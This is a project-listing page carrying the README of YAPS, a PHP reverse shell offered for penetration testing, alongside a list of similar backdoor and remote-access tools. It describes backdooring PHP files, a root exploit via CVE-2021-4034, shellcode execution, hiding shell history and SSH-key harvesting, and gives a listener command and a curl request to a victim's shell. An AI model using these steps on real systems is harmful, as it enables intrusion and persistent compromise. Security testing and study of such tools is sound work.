All Projects → Nickguitar → YAPS

Nickguitar / YAPS

Licence: other
Yet Another PHP Shell - The most complete PHP reverse shell

Programming Languages

PHP
14435 projects - #3 most used programming language

Projects that are alternatives of or similar to YAPS

Thc Archive
All releases of the security research group (a.k.a. hackers) The Hacker's Choice
Stars: ✭ 474 (+1254.29%)
Mutual labels:  exploit, penetration-testing, pentesting, pentest, pentest-tool
Jwtxploiter
A tool to test security of json web token
Stars: ✭ 130 (+271.43%)
Mutual labels:  penetration-testing, pentesting, pentest, ctf-tools, pentest-tool
Pwncat
pwncat - netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python (PSE)
Stars: ✭ 904 (+2482.86%)
Mutual labels:  reverse-shell, penetration-testing, pentesting, pentest, pentest-tool
Thoron
Thoron Framework is a Linux post-exploitation framework that exploits Linux TCP vulnerability to provide a shell-like connection. Thoron Framework has the ability to create simple payloads to provide Linux TCP attack.
Stars: ✭ 87 (+148.57%)
Mutual labels:  backdoor, reverse-shell, exploit, rat, pentesting
Trigmap
A wrapper for Nmap to quickly run network scans
Stars: ✭ 132 (+277.14%)
Mutual labels:  penetration-testing, pentesting, pentest, pentest-tool
Dirsearch
Web path scanner
Stars: ✭ 7,246 (+20602.86%)
Mutual labels:  penetration-testing, pentesting, bugbounty, pentest-tool
Androrat
A Simple android remote administration tool using sockets. It uses java on the client side and python on the server side
Stars: ✭ 187 (+434.29%)
Mutual labels:  backdoor, reverse-shell, exploit, rat
Defaultcreds Cheat Sheet
One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password 🛡️
Stars: ✭ 1,949 (+5468.57%)
Mutual labels:  exploit, pentesting, bugbounty, pentest
Kaboom
A tool to automate penetration tests
Stars: ✭ 322 (+820%)
Mutual labels:  penetration-testing, pentesting, pentest, pentest-tool
Docker Security Images
🔐 Docker Container for Penetration Testing & Security
Stars: ✭ 172 (+391.43%)
Mutual labels:  penetration-testing, pentesting, pentest, pentest-tool
Nightingale
It's a Docker Environment for pentesting which having all the required tool for VAPT.
Stars: ✭ 119 (+240%)
Mutual labels:  penetration-testing, bugbounty, ctf-tools, pentest-tool
Habu
Hacking Toolkit
Stars: ✭ 635 (+1714.29%)
Mutual labels:  penetration-testing, pentesting, pentest, pentest-tool
Thc Hydra
hydra
Stars: ✭ 5,645 (+16028.57%)
Mutual labels:  penetration-testing, pentesting, pentest, pentest-tool
Justtryharder
JustTryHarder, a cheat sheet which will aid you through the PWK course & the OSCP Exam. (Inspired by PayloadAllTheThings)
Stars: ✭ 450 (+1185.71%)
Mutual labels:  penetration-testing, pentesting, pentest, pentest-tool
Powershell Rat
Python based backdoor that uses Gmail to exfiltrate data through attachment. This RAT will help during red team engagements to backdoor any Windows machines. It tracks the user activity using screen capture and sends it to an attacker as an e-mail attachment.
Stars: ✭ 636 (+1717.14%)
Mutual labels:  backdoor, penetration-testing, rat, pentesting
Pupy
Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python
Stars: ✭ 6,737 (+19148.57%)
Mutual labels:  backdoor, reverse-shell, rat, pentesting
Knary
A simple HTTP(S) and DNS Canary bot with Slack/Discord/MS Teams & Pushover support
Stars: ✭ 187 (+434.29%)
Mutual labels:  penetration-testing, pentesting, bugbounty, ctf-tools
Offensive Docker
Offensive Docker is an image with the more used offensive tools to create an environment easily and quickly to launch assessment to the targets.
Stars: ✭ 328 (+837.14%)
Mutual labels:  pentesting, bugbounty, pentest, ctf-tools
Evilosx
An evil RAT (Remote Administration Tool) for macOS / OS X.
Stars: ✭ 1,826 (+5117.14%)
Mutual labels:  backdoor, reverse-shell, rat, pentesting
Offensive-Reverse-Shell-Cheat-Sheet
Offensive Reverse Shell (Cheat Sheet)
Stars: ✭ 138 (+294.29%)
Mutual labels:  reverse-shell, netcat, penetration-testing, pentest

YAPS - Yet Another PHP Shell

image

Yes, as the name reveals, this is yet another PHP reverse shell, one more among hundreds available out there, but with some advantages. It is a single PHP file containing all its functions and you can control it via a simple TCP listener (e.g. nc -lp 1337).

In the current version (1.5), its main functions support only linux systems, but i'm planning to make it work with Windows too.

It's currently in its first version and I haven't tested it much yet, and there are still many things I intend to do and improve for the next versions (it's not done yet!), so please let me know if you've found any bugs or have some suggestion for feature or improvement. =)

Features

  • Single PHP file (no need to install packages, libs, or download tons of files)
  • Works with netcat, ncat, socat, multi/handler, almost any listener
  • Customizable password protection
  • No logs in .bash_history
  • Does some enumeration
    • Network info (interfaces, iptables rules, active ports)
    • User info
    • List SUID and GUID files
    • Search for SSH keys (public and private)
    • List crontab
    • List writable PHP files
  • Auto download LinPEAS, LinEnum or Linux Exploit Suggester
  • Write and run PHP code on remote host
  • Spawn an interactive reverse shell
  • Duplicate as many connections as you want
  • Auto update
  • Infect PHP files with backdoors
  • Auto reverse root shell via pwnkit (CVE-2021-4034)
  • [NEW] Send and execute shellcode

Cons

  • Connection isn't encrypted (yet) (nc does not support SSL)
  • Not fully interactive (although you can spawn an interactive shell with !interactive)
    • CTRL+C breaks it; can't use arrows to navigate (unless you use rlwrap nc -lp <ip> <port>)

Usage

  1. Set up a TCP listener;
  2. Set your IP and port. This can be done by:
  • 2.1 Editing the variables at the start of the script;
  • 2.2 Setting them via post request (curl -x POST -d "x=ip:port" victim.com/yaps.php);
  1. Open yaps.php on browser, curl it or run via CLI;
  • 3.1 You can set yaps.php?s or yaps.php?silent to supress the banner
  • 3.2 You can run via CLI with php yaps.php ip port
  1. Hack!

Working commands

  • !help - Display the help menu
  • !all-colors - Toggle all colors (compatible with colorless TTY)
  • !color - Toggle PS1 color (locally only, no environment variable is changed)
  • !duplicate - Spawn another YAPS connection
  • !enum - Download LinPEAS and LinEnum to /tmp and get them ready to use
  • !info - list informations about the target (the enumeration I mentioned above)
  • !infect - Infect writable PHP files with backdoors
  • !interactive - Spawn interactive reverse shells on other ports (works w/ sudo, su, mysql, etc.)
  • !passwd - Password option (enable, disable, set, modify)
  • !php - Write and run PHP on the remote host
  • !pwnkit - Tries to exploit CVE-2021-4034 and spawn a root revere shell
  • !shellcode - Send and run shellcode on the remote host
  • !suggester - Download Linux Exploit Suggester to /tmp and get it ready to use

Screenshots

Click to expand screenshots section

Current commands:

commands

Doing some recon:

image

Root reverse shell through CVE-2021-4034

pwn

Sending and running shellcode!

shellcode

Spawning a interactive shell

interactive

Duplicating a YAPS session

duplicate

Poisoning PHP files

infect

Writing remote PHP code

remotephp

Password protected shell

passprotected

Changelog

v1.5 - 12/02/2022

  • Added !shellcode to receive and run an arbitrary shellcode
  • Improved duplicate() function (you can now a range of ports)
  • Changed function name from stabilize to interactive
  • Packed embeded codes to save space
  • Fixed broken links
  • Prepend "TERM=xterm" to all commands
  • Minor improvements

v1.4 - 04/02/2022

  • Added !pwnkit to exploit CVE-2021-4034 and spawn a root reverse shell
  • Improved verify_update() function
  • Minor improvements

v1.3.1 - 01/08/2021

  • Bugs fixed

v1.3 - 28/07/2021

  • Added !infect to infect PHP files with backdoors
  • Changed !stabilize payload (bugs fixed)

v1.2.2 - 18/07/2021

  • Changed 'update' function
  • Changed 'connect' function
  • Improved 'download' function
  • Bugs fixed

v1.2.1 - 17/07/2021

  • Bugs fixed

v1.2 - 17/07/2021

  • Added !duplicate to spawn another shell
  • Added update verification (--update|-u)
  • Added CLI arguments (--help|-h)
  • Added socket via arguments (php yaps.php ip port)
  • Changed stabilize shell method (doesn't freeze anymore)
  • Changed download method
  • Changed connection method via POST (receives a single parameter)

v1.1 - 12/07/2021

  • Added !all-colors to toggle terminal colors and work with colorless TTYs
  • Added exit command to close socket (leave shell)
  • Changed payload in !stabilize to unset HISTSIZE and HISTFILE
  • Changed the method of obtaining CPU and meminfo in !info

v1.0.1 - 08/07/2021

  • Changed [x,y,z] to array(x,y,z) to improve compatibility with older PHP versions
  • Changed payload for interactive shell to work with PHP<5.4

Credits

Some ideas were inspired by this tools:

Linpeas

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

Linenum

https://github.com/rebootuser/LinEnum

Suggester

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

Pentest Monkey

https://github.com/pentestmonkey/php-reverse-shell

Arthepsy exploit for pwnkit

https://github.com/arthepsy/CVE-2021-4034/

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected]